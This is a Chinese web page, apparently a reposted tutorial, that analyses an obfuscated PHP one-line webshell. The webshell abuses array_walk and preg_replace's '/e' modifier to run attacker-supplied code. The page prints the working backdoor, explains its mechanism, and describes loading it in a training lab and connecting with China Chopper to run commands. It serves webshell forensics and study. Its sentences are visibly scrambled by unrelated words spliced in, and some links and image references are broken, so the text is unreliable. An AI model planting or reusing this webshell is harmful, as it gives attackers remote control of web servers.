首页 > 作文

WebShell代码分析溯源(九)

更新时间:2023-04-07 19:24:54 阅读: 评论:0

webshell代码分析溯源(九)

一、一句话溶解度定义变形马样本

<?php $e = $_request[‘e’];$arr = array($_post[‘pass’] => ‘|.*|e’,);array_walk($arr, $e, ”);?>

二、代码分析

1、调整代码格式

  

2、分析代码

1、首先使用request方法接收url中拆迁条例的e参数的值,创建arr数组,然后array_walk对数组$arr中的每个元素应用用户自定义函数$e

注:,arrawta排名y_walk() 函数对数组中的每个元素应用用户自定义函数。在函数中,数组的键名和键值是参数。

参考: https://www.w3school.com.cn/php/func_array_walk.asp

2、此时看到’|.*|e’,首先想到的是正则表达式,使用preg_replace()函数, preg_replace() 将 replacement 参数当作 php 代码,正则意思为匹配模式出现/e修正符,后面的replacement就会被当作php代码执行, 这样就可以把 $_post[‘pass’]构造运行,此时一句话木马就变成了<?php preg_re汽车营销专业place(“|.*|e”, $_post[‘pass’],’’);?>

三、漏洞环境搭建

1、这里使用在线学习平台墨者学院中的实验环境(webshell代码分析溯源(第8题)),地址: /d/file/titlepic/ppspan style="font-size: 15px">2、代码环境,下载代码

  

3、分析(上面已经分析过了)

4、使用菜刀连接

  

5、执行一些命令

  

本文发布于:2023-04-07 19:24:52,感谢您对本站的认可!

本文链接:https://www.wtabcd.cn/fanwen/zuowen/e10501cb9ec710bf1c08fbb86378588a.html

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。

本文word下载地址:WebShell代码分析溯源(九).doc

本文 PDF 下载地址:WebShell代码分析溯源(九).pdf

标签:代码   函数   数组   自定义
相关文章
留言与评论(共有 0 条评论)
   
验证码:
Copyright ©2019-2022 Comsenz Inc.Powered by © 专利检索| 网站地图